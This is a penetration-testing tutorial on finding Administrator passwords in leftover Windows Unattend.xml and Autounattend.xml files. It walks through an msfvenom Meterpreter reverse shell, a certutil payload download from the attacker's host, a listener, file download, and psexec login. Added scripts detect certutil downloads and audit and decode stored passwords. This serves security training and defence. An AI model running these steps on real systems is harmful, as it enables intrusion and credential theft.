Searching For Passwords In Windows Configuration Files
Windows Configuration Files
Windows can automate a variety of repetitive tasks, such as the mass rollout or installation of Windows on many systems.
This is typically done through the use of the Unattended Windows Setup utility, which is used to automate the mass installation/deployment of Windows on systems.
This tool utilizes configuration files that contain specific configurations and user account credentials, specifically the Administrator account's password.
If the Unattended Windows Setup configuration files are left on the target system after installation, they can reveal user account credentials that an attacker can use to authenticate to the Windows target as a legitimate user.
Unattended Windows Setup
The Unattended Windows Setup utility will typically utilize one of the following configuration files that contain user account and system configuration information:
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Autounattend.xml
As a security precaution, the passwords stored in the Unattended Windows Setup configuration file may be encoded in base64.
Attack Flow for Installing Meterpreter Shell and Extracting Password Hashes
Overview
In this attack scenario, we aim to gain control over a Windows target server by installing a Meterpreter shell and then extracting password hashes from the Autounattend.xml or Unattend.xml files. These files often contain sensitive information, including password hashes, which can be used for further exploitation.
Steps in the Attack Flow
1. Create a Meterpreter Payload
Objective: Generate a malicious executable that will create a Meterpreter session on the Windows target server.
Command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_local_ip> LPORT=<your_local_port> -f exe -o meterpreter_shell.exe
Explanation: This command creates an exe file named meterpreter_shell.exe that, when executed on the target machine, will open a Meterpreter session back to your local machine.
2. Install the Meterpreter Payload on the Target Machine
Objective: Deliver and execute the meterpreter_shell.exe payload on the Windows target server.
Command:
certutil -urlcache -split -f http://<your_local_ip>/meterpreter_shell.exe C:\Users\Public\meterpreter_shell.exe
Explanation: This command uses certutil to download the meterpreter_shell.exe payload from your local machine and save it on the target machine.
Execute:
C:\Users\Public\meterpreter_shell.exe
Explanation: Manually execute the downloaded payload to open a Meterpreter session.
Certutil is a versatile Windows command-line tool used for managing and configuring certificates and certification authorities (CAs). It provides advanced capabilities for dumping cached credentials, exporting and importing certificates, and configuring certificate trust stores, making it essential for both system administration and post-exploitation security assessments.
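Because certutil is a signed, built-in binary, its ability to fetch files over HTTP is a standard detection target rather than something to block outright. The script below is an added example and is not part of the original page: it runs two simple rules over constructed process-creation records (a certutil invocation that carries a URL-fetching switch together with a URL, and an executable launched from a user-writable directory such as C:\Users\Public) and returns the records that fire. The record layout, the IP address, user names and file names are constructed for the example; the rule logic is the reviewer's own, not taken from any product.

```python
import re

# Constructed process-creation records in a Sysmon-like "key=value" layout
# separated by "|". Sample data for this example, not real telemetry.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -urlcache -split -f "
    "http://198.51.100.7/meterpreter_shell.exe C:\\Users\\Public\\meterpreter_shell.exe"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe|User=CORP\\jdoe",
    "Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -hashfile "
    "C:\\installers\\setup.msi SHA256|ParentImage=C:\\Windows\\System32\\cmd.exe|User=CORP\\admin",
    "Image=C:\\Users\\Public\\meterpreter_shell.exe|CommandLine=C:\\Users\\Public\\meterpreter_shell.exe"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe|User=CORP\\jdoe",
    "Image=C:\\Program Files\\Vendor\\app.exe|CommandLine=\"C:\\Program Files\\Vendor\\app.exe\" --update"
    "|ParentImage=C:\\Windows\\explorer.exe|User=CORP\\jdoe",
    "Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -urlcache * delete"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe|User=CORP\\admin",
]

DOWNLOAD_SWITCHES = {"-urlcache", "-verifyctl"}  # certutil switches that fetch a URL
# Path fragments for directories any local user can write to (lower-cased).
USER_WRITABLE = ("c:\\users\\public\\", "c:\\windows\\temp\\", "\\appdata\\local\\temp\\")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def parse_event(line):
    """Split a 'k=v|k=v' record into a dict; the first '=' separates key and value."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def evaluate(event):
    """Return the names of the rules an event matches (empty list when benign)."""
    alerts = []
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    # certutil accepts switches written with '-' or '/'; normalise both to '-'.
    switches = {"-" + t.lstrip("-/") for t in cmdline.lower().split() if t and t[0] in "-/"}
    if image.endswith("\\certutil.exe") and switches & DOWNLOAD_SWITCHES and URL_RE.search(cmdline):
        alerts.append("certutil_remote_download")
    if any(marker in image for marker in USER_WRITABLE):
        alerts.append("exec_from_user_writable_dir")
    return alerts


def scan(lines):
    """Apply evaluate() to every record and keep only the ones that fire."""
    findings = []
    for line in lines:
        event = parse_event(line)
        alerts = evaluate(event)
        if alerts:
            findings.append({"user": event.get("User"), "image": event.get("Image"), "alerts": alerts})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['user']} {f['image']}: {', '.join(f['alerts'])}")
```

The benign records (a hash check and a cache purge) pass through without firing, which is the point of requiring both the switch and a URL: alerting on every certutil execution would bury the download case in noise.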
3. Set Up a Listener on Your Local Machine
Objective: Prepare your local machine to receive a connection from the Meterpreter payload.
Command:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_local_ip>
set LPORT <your_local_port>
exploit
Explanation: This sets up a listener that waits for a connection from the Meterpreter shell.
4. Establish a Meterpreter Session
Objective: Gain control of the target system through the Meterpreter session.
Wait for the connection from the Meterpreter payload in the listener started in step 3. Once the connection is established, you will have control over the target machine.
5. Locate Autounattend.xml or Unattend.xml Files
Objective: Find the files that contain the password hashes.
Approach 1: Search Using Meterpreter
Command:
search -f autounattend.xml
search -f unattend.xml
Explanation: Use the search command in Meterpreter to look for Autounattend.xml or Unattend.xml files on the target system.
Approach 2: Manual Navigation
Directories to Check:
C:\Windows\System32\Sysprep
C:\
C:\ProgramData\Microsoft\Windows\
Explanation: Navigate to these directories to manually look for Autounattend.xml or Unattend.xml files.
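The following script is an added example, not code from the original page: an audit helper covering the locations listed in this step and in the Unattended Windows Setup section above. It checks a host for leftover Unattend.xml / Autounattend.xml files, parses every password-bearing element, and shows why the Base64 form described earlier offers no protection. It assumes the documented Windows Setup convention that a value whose PlainText flag is false is the Base64 encoding of the UTF-16LE string password + "Password"; the sample answer file, the account names and the depth limit are constructed for the example. The report deliberately prints only the element name, storage form and length, never the recovered value.

```python
import base64
import os
import xml.etree.ElementTree as ET

# Answer-file names left behind by Unattended Setup (compared lower-cased, NTFS being
# case-insensitive) and the locations the page names. Walking all of C:\ is slow,
# so scan_directories() takes a depth limit.
ANSWER_FILE_NAMES = {"unattend.xml", "autounattend.xml"}
DEFAULT_ROOTS = ["C:\\Windows\\Panther", "C:\\Windows\\System32\\Sysprep",
                 "C:\\ProgramData\\Microsoft\\Windows", "C:\\"]
PASSWORD_ELEMENTS = ("AdministratorPassword", "Password")
SUFFIX = "Password"  # Windows appends this before Base64-encoding the value

def encode_unattend_password(password):
    """Encode the way Windows Setup does when <PlainText> is false."""
    return base64.b64encode((password + SUFFIX).encode("utf-16-le")).decode("ascii")

def decode_unattend_password(value, plaintext):
    """Reverse the encoding; Base64 here is obfuscation, not protection."""
    if plaintext:
        return value
    raw = base64.b64decode(value).decode("utf-16-le")
    return raw[:-len(SUFFIX)] if raw.endswith(SUFFIX) else raw

def _local(tag):
    # Drop the urn:schemas-microsoft-com:unattend namespace prefix from a tag.
    return tag.rsplit("}", 1)[-1]

def extract_credentials(xml_text):
    """Return every password-bearing element found in one answer file."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        name = _local(elem.tag)
        if name not in PASSWORD_ELEMENTS:
            continue
        value, plaintext = None, True
        for child in elem:
            if _local(child.tag) == "Value":
                value = (child.text or "").strip()
            elif _local(child.tag) == "PlainText":
                plaintext = (child.text or "").strip().lower() != "false"
        if value is None:  # e.g. <Credentials><Password>x</Password> has no <Value>
            value = (elem.text or "").strip()
        if value:
            findings.append({"element": name, "plaintext": plaintext,
                             "password": decode_unattend_password(value, plaintext)})
    return findings

def scan_directories(roots=DEFAULT_ROOTS, max_depth=2):
    """Locate answer files under each root (max_depth levels down) and parse them."""
    results = []
    for root_dir in roots:
        if not os.path.isdir(root_dir):
            continue
        base_depth = root_dir.rstrip(os.sep).count(os.sep)
        for dirpath, dirs, files in os.walk(root_dir):
            if dirpath.rstrip(os.sep).count(os.sep) - base_depth >= max_depth:
                dirs[:] = []  # stop descending past the depth limit
            for fname in files:
                if fname.lower() not in ANSWER_FILE_NAMES:
                    continue
                path = os.path.join(dirpath, fname)
                try:
                    with open(path, encoding="utf-8-sig", errors="replace") as fh:
                        creds = extract_credentials(fh.read())
                    results.append({"path": path, "credentials": creds, "error": None})
                except ET.ParseError as exc:
                    results.append({"path": path, "credentials": [], "error": str(exc)})
    return results

def report(results):
    """Print findings without echoing the secret itself."""
    for r in results:
        if r["error"]:
            print(f"{r['path']}: not parseable ({r['error']})")
        for c in r["credentials"]:
            kind = "plaintext" if c["plaintext"] else "base64"
            print(f"{r['path']}: {c['element']} stored as {kind}, "
                  f"{len(c['password'])} chars; delete this file")

# Constructed sample answer file for the example, not a real deployment artifact.
SAMPLE_ANSWER_FILE = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <UserAccounts>
    <AdministratorPassword>
      <Value>{encode_unattend_password('S3cret!')}</Value>
      <PlainText>false</PlainText>
    </AdministratorPassword>
    <LocalAccounts><LocalAccount>
      <Password><Value>Welcome1</Value><PlainText>true</PlainText></Password>
      <Name>deploy</Name>
    </LocalAccount></LocalAccounts>
  </UserAccounts>
</unattend>"""

if __name__ == "__main__":
    report([{"path": "<sample>", "credentials": extract_credentials(SAMPLE_ANSWER_FILE), "error": None}])
    report(scan_directories())
```

Run it with administrative rights on the host being audited; a finding means the answer file still carries a usable credential, and the remediation is to delete the file (and rotate the password it embedded) rather than to rely on the Base64 wrapping.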
6. Download the Configuration Files
Objective: Transfer the Autounattend.xml or Unattend.xml files to your local machine for analysis.
Command:
download C:\Path\To\Autounattend.xml
download C:\Path\To\Unattend.xml
Explanation: Use the download command in Meterpreter to copy the files from the target machine to your local machine.
7. Extract and Use Password Hashes
Objective: Extract the password hashes from the downloaded files for further exploitation.
Tool: psexec.py
Command:
python psexec.py <target_ip> -u <username> -p <password>
Explanation: Use the psexec.py script to log into the target system using the extracted credentials.
Hacker's Mantra: Very smart people are often tricked by hackers, by phishing. I don't exclude myself from that. It's about being smarter than a hacker. Not about being smart. - Harper Reed